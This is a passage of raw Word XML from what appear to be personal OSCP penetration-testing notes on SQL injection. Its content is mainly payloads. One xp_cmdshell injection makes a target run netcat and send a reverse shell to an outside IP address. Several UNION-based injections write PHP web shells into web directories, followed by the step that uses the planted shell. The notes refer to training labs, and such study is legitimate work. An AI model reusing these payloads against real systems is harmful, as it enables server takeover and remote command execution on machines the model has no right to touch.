      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This puts nc.exe inside of the target machine. Replace nc.exe with nc64.exe if it's a 64 bit system. Or try both in case you don't know. And nc.exe works with 64-bit system sometimes too</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000176F">
      <w:pPr>
        <w:ind w:left="1080" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="e84c22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="e84c22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001770">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">';EXEC xp_cmdshell 'C:\windows\temp\nc.exe 192.168.45.232 80 -e cmd.exe';--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001771">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1406"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This executes the reverse shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001772">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001773">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001774">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001775">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001776">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_wbedofmw5idy" w:id="194"/>
      <w:bookmarkEnd w:id="194"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enabling command execution with xp_cmdshell through mssql client </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(only works for mssql)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001777">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001778">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP-B .148</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we had access to mssql client, and we enabled command execution while inside of it to send a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001779">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000177A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">More information can be found in the "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get command execution in mssql after you are sysadmin</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" section of mssql, but it's basically the same as the stuff above but you just run those commands inside of the client now</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000177B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000177C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_e3hj9cko0o0f" w:id="195"/>
      <w:bookmarkEnd w:id="195"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Uploading web shell through sql injection (through UNION-based payload)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000177D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000177E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also taught in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP 10.3.1. Manual Code Execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000177F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="530"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT "&lt;?php system($_GET['cmd']);?&gt;", null, null, null, null INTO OUTFILE "/var/www/html/tmp/webshell.php" -- //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001780">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001781">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have LFI, then you can put the rev shell anywhere, like /dev/shm or /tmp and then access rev shell using LFI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001782">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001783">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The follow is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId477">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hawat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784">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001785">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pebbles</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice down below, we saw an exploit that gave us SQL injection but it was based on command injection, so we didn't have to escape any quotes or anything like that. It's pretty uncommon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001786">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001787">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As shown in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId478">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hawat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice, in the real-world, we often have to use single quotes and a UNION-based payload in order to escape the first original SELECT statement and use our own in order to do something like uploading web shell. We can see this down here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001788">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001789">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="714"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' union select '&lt;?php echo system($_REQUEST["cmd"]); ?&gt;' into outfile </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'/srv/http/cmd.php' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000178A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We found that the root web directory was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/srv/http/cmd.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">by looking at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpinfo.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000178B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace it with whatever your root web directory is </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000178C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$_REQUEST is a superglobal that merges GET, POST, and COOKIE variables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000178D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since this is a union payload, you need to find the number of columns of the original SELECT statement. Down below, we have the source code and can see the original SELECT statement only queries one column, so we are fine here. But in general, you would have to find the exact number of columns. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000178E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="561"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This technique can be seen in the UNION-based SQL injection section</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000178F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001790">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then to interact with web shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001791">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="958"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/cmd.php?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001792">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001793">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001794">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The reason why they used REQUEST instead of GET is because GET was blocked by the site. This was as seen in this </w:t>
      </w:r>
      <w:hyperlink r:id="rId479">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Hawat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup. And this writeup also shows us how to get reverse shell from the webshell. And only certain types of URL encoding worked for him, specifically only using </w:t>
      </w:r>
      <w:hyperlink r:id="rId480">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.url-encode-decode.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. URL encoding reverse shell taught here. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001795">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001796">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you wanted a classic GET php web shell, then just replace REQUEST with GET:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001797">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="837"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' union select '&lt;?php echo system($_GET["cmd"]); ?&gt;' into outfile </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'/srv/http/cmd.php' </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001798">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001799">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000179A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
